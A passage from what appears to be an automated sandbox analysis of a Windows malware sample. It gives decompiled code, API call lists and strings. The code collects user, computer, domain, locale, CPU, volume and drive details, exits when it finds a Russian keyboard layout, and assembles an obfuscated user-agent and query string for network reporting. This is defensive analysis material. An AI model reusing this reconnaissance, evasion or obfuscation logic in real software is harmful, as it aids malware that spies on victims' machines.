					if( *(_t279 + 0x30) == 0) {
						L18:
						if( *((intOrPtr*)(_t279 + 0x3c)) == 0) {
							L31:
							if( *((intOrPtr*)(_t279 + 0x48)) != 0) {
								_t220 = VirtualAlloc(0, 0x82, 0x3000, 4); // executed
								_push(_t260);
								 *(_t279 + 0x50) = _t220;
								_t221 = E0F587410(_t260, 0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"productName", _t220, 0x80); // executed
								if(_t221 == 0) {
									_push(_t260);
									E0F587410(_t260, 0x80000002, L"SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion", L"productName",  *(_t279 + 0x50), 0x80);
									wsprintfW( *(_t279 + 0x50), L"error");
									_t281 = _t281 + 8;
								}
							}
							if( *((intOrPtr*)(_t279 + 0x54)) == 0) {
								L44:
								if( *((intOrPtr*)(_t279 + 0x24)) != 0) {
									_v28 = 0;
									_t216 = E0F587B70(_t279 + 0x2c,  &_v28); // executed
									if(_t216 == 0) {
										 *((intOrPtr*)(_t279 + 0x24)) = _t216;
									}
								}
								if( *((intOrPtr*)(_t279 + 0x60)) != 0) {
									_t190 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
									 *(_t279 + 0x68) = _t190;
									_t191 = VirtualAlloc(0, 0xe0c, 0x3000, 4); // executed
									_t276 = _t191;
									GetWindowsDirectoryW(_t276, 0x100);
									_t66 = _t276 + 0x600; // 0x600
									_t266 = _t66;
									 *((short*)(_t276 + 6)) = 0;
									_t68 = _t276 + 0x400; // 0x400
									_t69 = _t276 + 0x604; // 0x604
									_t70 = _t276 + 0x608; // 0x608
									_t71 = _t276 + 0x200; // 0x200
									GetVolumeInformationW(_t276, _t71, 0x100, _t266, _t70, _t69, _t68, 0x100); // executed
									_push(_t266);
									_t72 = _t276 + 0x60c; // 0x60c
									_t260 = _t72;
									_t199 = E0F587410(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"ProcessorNameString", _t260, 0x80); // executed
									if(_t199 != 0) {
										_t73 = _t276 + 0x60c; // 0x60c
										_t211 = lstrlenW(_t73);
										_t74 = _t276 + 0x60c; // 0x60c
										_t260 = _t74;
										_push(_t260);
										E0F587410(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"Identifier", _t260 + _t211 * 2, 0x80); // executed
									}
									wsprintfW( *(_t279 + 0x68), L"%d",  *(_t276 + 0x600));
									_t79 = _t276 + 0x60c; // 0x60c
									_t281 = _t281 + 0xc;
									lstrcatW( *(_t279 + 0x68), _t79);
									_t204 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlComputeCrc32");
									_v28 = _t204;
									if(_t204 == 0) {
										 *(_t279 + 0x6c) = 0;
									} else {
										 *(_t279 + 0x6c) = _v28(0x29a,  *(_t279 + 0x68), lstrlenW( *(_t279 + 0x68)) + _t207);
									}
									 *(_t279 + 0x70) =  *(_t276 + 0x600);
									VirtualFree(_t276, 0, 0x8000); // executed
								}
								if( *((intOrPtr*)(_t279 + 0x74)) == 0) {
									L67:
									if( *(_t279 + 0x80) == 0) {
										L72:
										return 1;
									}
									_t154 = VirtualAlloc(0, 0x81, 0x3000, 4); // executed
									 *(_t279 + 0x84) = _t154;
									if(_t154 == 0) {
										L71:
										 *(_t279 + 0x80) = 0;
										goto L72;
									}
									_push(_t260);
									_t155 = E0F586FF0(_t154); // executed
									if(_t155 != 0) {
										goto L72;
									}
									VirtualFree( *(_t279 + 0x84), _t155, 0x8000); // executed
									goto L71;
								} else {
									_v68 = L"UNKNOWN";
									_v64 = L"NO_ROOT_DIR";
									_v60 = L"REMOVABLE";
									_v56 = L"FIXED";
									_v52 = L"REMOTE";
									_v48 = L"CDROM";
									_v44 = L"RAMDISK";
									_t157 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
									 *(_t279 + 0x7c) = _t157;
									_t261 =  &_v132;
									_t158 = 0x41;
									do {
										 *_t261 = _t158;
										_t261 = _t261 + 2;
										_t158 = _t158 + 1;
									} while (_t158 <= 0x5a);
									_t159 =  *L"?:\\"; // 0x3a003f
									_v40 = _t159;
									_t160 =  *0xf58f350; // 0x5c
									_v36 = _t160;
									_t161 = 0;
									_v24 = 0;
									do {
										_v40 =  *((intOrPtr*)(_t280 + _t161 * 2 - 0x80));
										_t164 = GetDriveTypeW( &_v40); // executed
										_t270 = _t164;
										if(_t270 > 2 && _t270 != 5) {
											_v36 = 0;
											lstrcatW( *(_t279 + 0x7c),  &_v40);
											_v36 = 0x5c;
											lstrcatW( *(_t279 + 0x7c),  *(_t280 + _t270 * 4 - 0x40));
											lstrcatW( *(_t279 + 0x7c), "_");
											_t178 = GetDiskFreeSpaceW( &_v40,  &_v28,  &_v20,  &_v12,  &_v16); // executed
											if(_t178 == 0) {
												lstrcatW( *(_t279 + 0x7c), L"0,");
												goto L64;
											}
											_v8 = E0F588AB0(_v16, 0, _v28 * _v20, 0);
											_t256 = _t267;
											_t181 = E0F588AB0(_v12, 0, _v28 * _v20, 0);
											_t274 = _v8;
											_v32 = _t274 - _t181;
											asm("sbb eax, edx");
											_v8 = _t256;
											_t183 = lstrlenW( *(_t279 + 0x7c));
											_push(_t256);
											wsprintfW( &(( *(_t279 + 0x7c))[_t183]), L"%I64u/", _t274);
											_t186 = lstrlenW( *(_t279 + 0x7c));
											_push(_v8);
											wsprintfW( &(( *(_t279 + 0x7c))[_t186]), L"%I64u", _v32);
											_t281 = _t281 + 0x20;
											lstrcatW( *(_t279 + 0x7c), ",");
										}
										_t161 = _v24 + 1;
										_v24 = _t161;
									} while (_t161 < 0x1b);
									_t166 = lstrlenW( *(_t279 + 0x7c));
									_t260 =  *(_t279 + 0x7c);
									 *((short*)(_t260 + _t166 * 2 - 2)) = 0;
									goto L67;
								}
							} else {
								__imp__GetNativeSystemInfo( &_v76); // executed
								_t218 = VirtualAlloc(0, 0x40, 0x3000, 4); // executed
								_t260 = _v76 & 0x0000ffff;
								 *(_t279 + 0x5c) = _t218;
								if(_t260 > 9) {
									L42:
									_push(L"Unknown");
									L43:
									wsprintfW(_t218, ??);
									_t281 = _t281 + 8;
									goto L44;
								}
								_t260 =  *(_t260 + E0F587B60) & 0x000000ff;
								switch( *((intOrPtr*)(_t260 * 4 +  &M0F587B4C))) {
									case 0:
										_push(L"x86");
										goto L43;
									case 1:
										_push(L"ARM");
										goto L43;
									case 2:
										_push(L"Itanium");
										goto L43;
									case 3:
										_push(L"x64");
										goto L43;
									case 4:
										goto L42;
								}
							}
						}
						_t224 = VirtualAlloc(0, 0x8a, 0x3000, 4); // executed
						_v8 = _t224;
						_v20 = _t224 + 0xe;
						_t226 = VirtualAlloc(0, 4, 0x3000, 4); // executed
						 *(_t279 + 0x44) = _t226;
						_t277 = 1;
						_v24 = 1;
						do {
							wsprintfW(_v8, L"%d", _t277);
							_t281 = _t281 + 0xc;
							_v16 = 0;
							_t277 = _t277 + 1;
							_t229 = RegOpenKeyExW(0x80000001, L"Keyboard Layout\\Preload", 0, 0x20019,  &_v12); // executed
							if(_t229 != 0) {
								L27:
								_t230 = 0;
								_v24 = 0;
								goto L28;
							}
							_v28 = 0x80;
							_t234 = RegQueryValueExW(_v12, _v8, 0, 0, _v20,  &_v28); // executed
							if(_t234 != 0) {
								GetLastError();
							} else {
								_v16 = 1;
							}
							RegCloseKey(_v12); // executed
							if(_v16 == 0) {
								goto L27;
							} else {
								if(lstrcmpiW(_v20, L"00000419") == 0) {
									_t218 = wsprintfW( *(_t279 + 0x44), "1");
									_t281 = _t281 + 8;
									ExitProcess(0);
								}
								_t230 = _v24;
							}
							L28:
						} while (_t277 != 9 && _t230 != 0);
						wsprintfW( *(_t279 + 0x44), "0");
						_t281 = _t281 + 8;
						VirtualFree(_v8, 0, 0x8000); // executed
						goto L31;
					}
					_t238 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
					_v20 = _t238;
					 *(_t279 + 0x38) = _t238;
					_v12 = 0;
					_t240 = RegOpenKeyExW(0x80000001, L"Control Panel\\International", 0, 0x20019,  &_v8); // executed
					if(_t240 != 0) {
						L17:
						 *(_t279 + 0x30) = 0;
						VirtualFree( *(_t279 + 0x38), 0, 0x8000);
						goto L18;
					}
					_v24 = 0x40;
					_t243 = RegQueryValueExW(_v8, L"LocaleName", 0, 0, _v20,  &_v24); // executed
					if(_t243 != 0) {
						GetLastError();
					} else {
						_v12 = 1;
					}
					RegCloseKey(_v8); // executed
					if(_v12 != 0) {
						goto L18;
					} else {
						goto L17;
					}
				} else {
					_t246 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
					 *(_t279 + 0x20) = _t246;
					if(_t246 == 0) {
						goto L11;
					}
					_push(_t260);
					_t247 = E0F587410(_t260, 0x80000002, L"SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters", L"Domain", _t246, 0x80); // executed
					if(_t247 == 0) {
						wsprintfW( *(_t279 + 0x20), L"undefined");
						L10:
						_t281 = _t281 + 8;
						goto L11;
					}
					_t249 =  *(_t279 + 0x20);
					if( *_t249 != 0) {
						goto L11;
					}
					wsprintfW(_t249, L"WORKGROUP");
					goto L10;
				}
			}

0x0f587490
0x0f587490
0x0f58749b
0x0f5874a7
0x0f5874b7
0x0f5874b9
0x0f5874bc
0x0f5874c1
0x0f5874c8
0x0f5874c8
0x0f5874d2
0x0f5874df
0x0f5874e6
0x0f5874e8
0x0f5874eb
0x0f5874f0
0x0f5874f0
0x0f587500
0x0f587556
0x0f58755a
0x0f5875f5
0x0f5875f9
0x0f5876f9
0x0f5876fd
0x0f58770d
0x0f58770f
0x0f587725
0x0f587728
0x0f58772f
0x0f587731
0x0f587749
0x0f587756
0x0f587758
0x0f587758
0x0f58772f
0x0f58775f
0x0f5877ce
0x0f5877d2
0x0f5877d7
0x0f5877e3
0x0f5877ea
0x0f5877ec
0x0f5877ec
0x0f5877ea
0x0f5877f3
0x0f587807
0x0f587817
0x0f58781a
0x0f58781c
0x0f587824
0x0f58782c
0x0f58782c
0x0f587837
0x0f58783b
0x0f587842
0x0f587849
0x0f587856
0x0f58785e
0x0f587864
0x0f58786a
0x0f58786a
0x0f587880
0x0f587887
0x0f587889
0x0f587890
0x0f587896
0x0f587896
0x0f58789c
0x0f5878b5
0x0f5878b5
0x0f5878c8
0x0f5878d0
0x0f5878d6
0x0f5878dd
0x0f5878f0
0x0f5878f6
0x0f5878fb
0x0f587919
0x0f5878fd
0x0f587914
0x0f587914
0x0f58792e
0x0f587931
0x0f587931
0x0f587943
0x0f587af2
0x0f587af9
0x0f587b42
0x0f587b4b
0x0f587b4b
0x0f587b09
0x0f587b0f
0x0f587b17
0x0f587b36
0x0f587b36
0x00000000
0x0f587b36
0x0f587b19
0x0f587b1b
0x0f587b22
0x00000000
0x00000000
0x0f587b30
0x00000000
0x0f587949
0x0f587957
0x0f58795e
0x0f587965
0x0f58796c
0x0f587973
0x0f58797a
0x0f587981
0x0f587988
0x0f58798e
0x0f587991
0x0f587994
0x0f5879a0
0x0f5879a0
0x0f5879a3
0x0f5879a6
0x0f5879a7
0x0f5879ad
0x0f5879b2
0x0f5879b5
0x0f5879ba
0x0f5879bd
0x0f5879bf
0x0f5879c2
0x0f5879c7
0x0f5879cf
0x0f5879d5
0x0f5879da
0x0f5879eb
0x0f5879f6
0x0f587a04
0x0f587a08
0x0f587a12
0x0f587a28
0x0f587a30
0x0f587acb
0x00000000
0x0f587acb
0x0f587a52
0x0f587a55
0x0f587a57
0x0f587a5c
0x0f587a68
0x0f587a6b
0x0f587a6d
0x0f587a70
0x0f587a79
0x0f587a8a
0x0f587a98
0x0f587a9a
0x0f587aac
0x0f587ab4
0x0f587abf
0x0f587abf
0x0f587ad6
0x0f587ad7
0x0f587ada
0x0f587ae6
0x0f587ae8
0x0f587aed
0x00000000
0x0f587aed
0x0f587761
0x0f587765
0x0f587776
0x0f587778
0x0f58777c
0x0f587782
0x0f5877c3
0x0f5877c3
0x0f5877c8
0x0f5877c9
0x0f5877cb
0x00000000
0x0f5877cb
0x0f587784
0x0f58778b
0x00000000
0x0f5877bc
0x00000000
0x00000000
0x0f5877ae
0x00000000
0x00000000
0x0f5877b5
0x00000000
0x00000000
0x0f5877a7
0x00000000
0x00000000
0x00000000
0x00000000
0x0f58778b
0x0f58775f
0x0f58760d
0x0f587616
0x0f587620
0x0f587623
0x0f587625
0x0f587628
0x0f58762d
0x0f587634
0x0f58763d
0x0f58763f
0x0f587642
0x0f58764c
0x0f58765f
0x0f587667
0x0f5876c4
0x0f5876c4
0x0f5876c6
0x00000000
0x0f5876c6
0x0f58766c
0x0f587681
0x0f587689
0x0f587694
0x0f58768b
0x0f58768b
0x0f58768b
0x0f58769d
0x0f5876a7
0x00000000
0x0f5876a9
0x0f5876b9
0x0f58779a
0x0f58779c
0x0f5877a1
0x0f5877a1
0x0f5876bf
0x0f5876bf
0x0f5876c9
0x0f5876c9
0x0f5876de
0x0f5876e0
0x0f5876ed
0x00000000
0x0f5876f3
0x0f58756e
0x0f587570
0x0f587573
0x0f58758b
0x0f587592
0x0f58759a
0x0f5875de
0x0f5875e8
0x0f5875ef
0x00000000
0x0f5875ef
0x0f58759f
0x0f5875b6
0x0f5875be
0x0f5875c9
0x0f5875c0
0x0f5875c0
0x0f5875c0
0x0f5875d2
0x0f5875dc
0x00000000
0x00000000
0x00000000
0x00000000
0x0f587502
0x0f587510
0x0f587512
0x0f587517
0x00000000
0x00000000
0x0f587519
0x0f58752f
0x0f587536
0x0f587551
0x0f587551
0x0f587553
0x00000000
0x0f587553
0x0f587538
0x0f58753f
0x00000000
0x00000000
0x0f587551
0x00000000
0x0f587551

APIs

VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F5874B7
GetUserNameW.ADVAPI32 ref: 0F5874C8
VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F5874E6
GetComputerNameW.KERNEL32 ref: 0F5874F0
VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F587510
wsprintfW.USER32 ref: 0F587551
VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F58756E
RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F587592
RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0F584810,?), ref: 0F5875B6
GetLastError.KERNEL32 ref: 0F5875C9
RegCloseKey.KERNEL32(00000000), ref: 0F5875D2
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F5875EF
VirtualAlloc.KERNEL32(00000000,0000008A,00003000,00000004), ref: 0F58760D
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0F587623
wsprintfW.USER32 ref: 0F58763D
RegOpenKeyExW.KERNEL32(80000001,Keyboard Layout\Preload,00000000,00020019,?), ref: 0F58765F
RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,0F584810,?), ref: 0F587681
GetLastError.KERNEL32 ref: 0F587694
RegCloseKey.KERNEL32(?), ref: 0F58769D
lstrcmpiW.KERNEL32(0F584810,00000419), ref: 0F5876B1
wsprintfW.USER32 ref: 0F5876DE
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F5876ED
VirtualAlloc.KERNEL32(00000000,00000082,00003000,00000004), ref: 0F58770D
wsprintfW.USER32 ref: 0F587756
GetNativeSystemInfo.KERNEL32(?), ref: 0F587765
VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000004), ref: 0F587776
wsprintfW.USER32 ref: 0F58779A
ExitProcess.KERNEL32 ref: 0F5877A1
wsprintfW.USER32 ref: 0F5877C9
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F587807
VirtualAlloc.KERNEL32(00000000,00000E0C,00003000,00000004), ref: 0F58781A
GetWindowsDirectoryW.KERNEL32(00000000,00000100), ref: 0F587824
GetVolumeInformationW.KERNEL32(00000000,00000200,00000100,00000600,00000608,00000604,00000400,00000100), ref: 0F58785E
lstrlenW.KERNEL32(0000060C,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F587890
wsprintfW.USER32 ref: 0F5878C8
lstrcatW.KERNEL32 ref: 0F5878DD
GetModuleHandleW.KERNEL32(ntdll.dll,RtlComputeCrc32), ref: 0F5878E9
GetProcAddress.KERNEL32(00000000), ref: 0F5878F0
lstrlenW.KERNEL32(?), ref: 0F587900
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F587931

Part of subcall function 0F587B70: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,772966A0,?,76F0C0B0), ref: 0F587B8D
Part of subcall function 0F587B70: VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0F587C01
Part of subcall function 0F587B70: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0F587C16
Part of subcall function 0F587B70: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F587C2C

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F587988
GetDriveTypeW.KERNEL32(?), ref: 0F5879CF
lstrcatW.KERNEL32 ref: 0F5879F6
lstrcatW.KERNEL32 ref: 0F587A08
lstrcatW.KERNEL32 ref: 0F587A12
GetDiskFreeSpaceW.KERNEL32(?,?,0F584810,?,00000000), ref: 0F587A28
lstrlenW.KERNEL32(?,?,00000000,0F584810,00000000,00000000,00000000,0F584810,00000000), ref: 0F587A70
wsprintfW.USER32 ref: 0F587A8A
lstrlenW.KERNEL32(?), ref: 0F587A98
wsprintfW.USER32 ref: 0F587AAC
lstrcatW.KERNEL32 ref: 0F587ABF
lstrcatW.KERNEL32 ref: 0F587ACB
lstrlenW.KERNEL32(?), ref: 0F587AE6
VirtualAlloc.KERNEL32(00000000,00000081,00003000,00000004), ref: 0F587B09
VirtualFree.KERNELBASE(?,00000000,00008000,00000000), ref: 0F587B30

Strings

SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion, xrefs: 0F58773F
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0F58771B
ARM, xrefs: 0F5877AE
00000419, xrefs: 0F5876A9
SYSTEM\CurrentControlSet\services\Tcpip\Parameters, xrefs: 0F587525
productName, xrefs: 0F587716, 0F58773A
Keyboard Layout\Preload, xrefs: 0F587655
ProcessorNameString, xrefs: 0F587871
Domain, xrefs: 0F587520
%I64u/, xrefs: 0F587A84
x64, xrefs: 0F5877A7
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 0F587876, 0F5878AB
Identifier, xrefs: 0F5878A6
Control Panel\International, xrefs: 0F587581
%I64u, xrefs: 0F587AA3
error, xrefs: 0F58774E
@, xrefs: 0F58759F
RtlComputeCrc32, xrefs: 0F5878DF
?:\, xrefs: 0F5879AD
WORKGROUP, xrefs: 0F587541
Itanium, xrefs: 0F5877B5
i)w, xrefs: 0F5876B1
LocaleName, xrefs: 0F5875AE
Unknown, xrefs: 0F5877C3
x86, xrefs: 0F5877BC
undefined, xrefs: 0F587549
ntdll.dll, xrefs: 0F5878E4

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$wsprintf$Freelstrcat$lstrlen$CloseErrorLastNameOpenQueryValue$AddressComputerCreateDirectoryDiskDriveExitHandleInfoInformationModuleNativeProcProcessSnapshotSpaceSystemToolhelp32TypeUserVolumeWindowslstrcmpi
String ID: i)w$%I64u$%I64u/$00000419$?:\$@$ARM$Control Panel\International$Domain$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Identifier$Itanium$Keyboard Layout\Preload$LocaleName$ProcessorNameString$RtlComputeCrc32$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion$SYSTEM\CurrentControlSet\services\Tcpip\Parameters$Unknown$WORKGROUP$error$ntdll.dll$productName$undefined$x64$x86
API String ID: 153366582-3138453034
Opcode ID: db598fd2247acd5e6e387bbb91f9700466951a2b3789d0d5468cdaf3fc115aab
Instruction ID: f5e740bde8b69a31add8ab3e31f9ba906fc42162dc3dd32bb0a4b36d1f2c38c9
Opcode Fuzzy Hash: db598fd2247acd5e6e387bbb91f9700466951a2b3789d0d5468cdaf3fc115aab
Instruction Fuzzy Hash: 2C12C170640305FBEB24AFA4DD45FAABBB4FF08701F200929F641B62D1D7B4A516DB54

Uniqueness

Uniqueness Score: -1.00%

Function 0F587E40 Relevance: 98.1, APIs: 2, Strings: 54, Instructions: 88
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0F587E40(void* __ecx) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				short _v224;
				WCHAR* _t62;
				void* _t64;

				_v8 = 0;
				_v224 = 0x6f004d;
				_v220 = 0x69007a;
				_v216 = 0x6c006c;
				_v212 = 0x2f0061;
				_v208 = 0x2e0035;
				_v204 = 0x200030;
				_v200 = 0x570028;
				_v196 = 0x6e0069;
				_v192 = 0x6f0064;
				_v188 = 0x730077;
				_v184 = 0x4e0020;
				_v180 = 0x200054;
				_v176 = 0x2e0036;
				_v172 = 0x3b0031;
				_v168 = 0x570020;
				_v164 = 0x57004f;
				_v160 = 0x340036;
				_v156 = 0x200029;
				_v152 = 0x700041;
				_v148 = 0x6c0070;
				_v144 = 0x570065;
				_v140 = 0x620065;
				_v136 = 0x69004b;
				_v132 = 0x2f0074;
				_v128 = 0x330035;
				_v124 = 0x2e0037;
				_v120 = 0x360033;
				_v116 = 0x280020;
				_v112 = 0x48004b;
				_v108 = 0x4d0054;
				_v104 = 0x2c004c;
				_v100 = 0x6c0020;
				_v96 = 0x6b0069;
				_v92 = 0x200065;
				_v88 = 0x650047;
				_v84 = 0x6b0063;
				_v80 = 0x29006f;
				_v76 = 0x430020;
				_v72 = 0x720068;
				_v68 = 0x6d006f;
				_v64 = 0x2f0065;
				_v60 = 0x350035;
				_v56 = 0x30002e;
				_v52 = 0x32002e;
				_v48 = 0x380038;
				_v44 = 0x2e0033;
				_v40 = 0x370038;
				_v36 = 0x530020;
				_v32 = 0x660061;
				_v28 = 0x720061;
				_v24 = 0x2f0069;
				_v20 = 0x330035;
				_v16 = 0x2e0037;
				_v12 = 0x360033;
				_t62 = InternetOpenW( &_v224, 0, 0, 0, 0); // executed
				 *(__ecx + 4) = _t62;
				if(_t62 == 0) {
					_t64 = InternetOpenW( &_v224, 1, _t62, _t62, 0x10000000);
					 *(__ecx + 4) = _t64;
					return _t64;
				}
				return _t62;
			}

0x0f587e58
0x0f587e64
0x0f587e6f
0x0f587e79
0x0f587e83
0x0f587e8d
0x0f587e97
0x0f587ea1
0x0f587eab
0x0f587eb5
0x0f587ebf
0x0f587ec9
0x0f587ed3
0x0f587edd
0x0f587ee7
0x0f587ef1
0x0f587efb
0x0f587f05
0x0f587f0f
0x0f587f19
0x0f587f23
0x0f587f2d
0x0f587f37
0x0f587f41
0x0f587f4b
0x0f587f52
0x0f587f59
0x0f587f60
0x0f587f67
0x0f587f6e
0x0f587f75
0x0f587f7c
0x0f587f83
0x0f587f8a
0x0f587f91
0x0f587f98
0x0f587f9f
0x0f587fa6
0x0f587fad
0x0f587fb4
0x0f587fbb
0x0f587fc2
0x0f587fc9
0x0f587fd0
0x0f587fd7
0x0f587fde
0x0f587fe5
0x0f587fec
0x0f587ff3
0x0f587ffa
0x0f588001
0x0f588008
0x0f58800f
0x0f588016
0x0f58801d
0x0f588024
0x0f588026
0x0f58802b
0x0f58803d
0x0f58803f
0x00000000
0x0f58803f
0x0f588048

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F588024
InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F58803D

Strings

e, xrefs: 0F587F37
L, xrefs: 0F587F7C
, xrefs: 0F587F83
), xrefs: 0F587F0F
3, xrefs: 0F58801D
5, xrefs: 0F587F52
0, xrefs: 0F587E97
, xrefs: 0F587EC9
7, xrefs: 0F587F59
e, xrefs: 0F587F91
o, xrefs: 0F587FA6
A, xrefs: 0F587F19
1, xrefs: 0F587EE7
., xrefs: 0F587FD0
a, xrefs: 0F587E83
K, xrefs: 0F587F41
i, xrefs: 0F588008
c, xrefs: 0F587F9F
O, xrefs: 0F587EFB
i, xrefs: 0F587EAB
6, xrefs: 0F587EDD
3, xrefs: 0F587FE5
(, xrefs: 0F587EA1
, xrefs: 0F587EF1
M, xrefs: 0F587E64
e, xrefs: 0F587F2D
, xrefs: 0F587FF3
., xrefs: 0F587FD7
5, xrefs: 0F587E8D
z, xrefs: 0F587E6F
a, xrefs: 0F587FFA
t, xrefs: 0F587F4B
l, xrefs: 0F587E79
p, xrefs: 0F587F23
G, xrefs: 0F587F98
o, xrefs: 0F587FBB
5, xrefs: 0F587FC9
T, xrefs: 0F587F75
3, xrefs: 0F587F60
h, xrefs: 0F587FB4
d, xrefs: 0F587EB5
7, xrefs: 0F588016
5, xrefs: 0F58800F
8, xrefs: 0F587FDE
, xrefs: 0F587F67
8, xrefs: 0F587FEC
, xrefs: 0F587FAD
i, xrefs: 0F587F8A
w, xrefs: 0F587EBF
e, xrefs: 0F587FC2
T, xrefs: 0F587ED3
6, xrefs: 0F587F05
K, xrefs: 0F587F6E
a, xrefs: 0F588001

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID: $ $ $ $ $ $($)$.$.$0$1$3$3$3$5$5$5$5$6$6$7$7$8$8$A$G$K$K$L$M$O$T$T$a$a$a$c$d$e$e$e$e$h$i$i$i$l$o$o$p$t$w$z
API String ID: 2038078732-2805935662
Opcode ID: 43eda7eb153750cf251a9508cb1ede0c79da4b0e82fd346071d385916bd76b98
Instruction ID: 5672efb346f68e9b87db7bb9083adcb45b8cdd0991eab0da747c6c53c0f5ba0e
Opcode Fuzzy Hash: 43eda7eb153750cf251a9508cb1ede0c79da4b0e82fd346071d385916bd76b98
Instruction Fuzzy Hash: 2B4197B4811358DEEB258F91999879EBFF5BB04748F50819ED5087B201C7F60A89CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0F5870A0 Relevance: 89.4, APIs: 49, Strings: 2, Instructions: 196
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0F5870A0(intOrPtr* __ecx, WCHAR* _a4) {
				WCHAR* _t47;
				intOrPtr* _t91;
				intOrPtr _t94;
				WCHAR* _t96;

				_t91 = __ecx;
				_t96 = _a4;
				if( *((intOrPtr*)(__ecx + 0x80)) != 0) {
					lstrcatW(_t96,  *(__ecx + 0x88));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x84));
					lstrcatW(_t96, "&");
				}
				if( *_t91 != 0) {
					lstrcatW(_t96,  *(_t91 + 4));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 8));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0xc)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x10));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x14));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x18)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x1c));
					lstrcatW(_t96, "=");
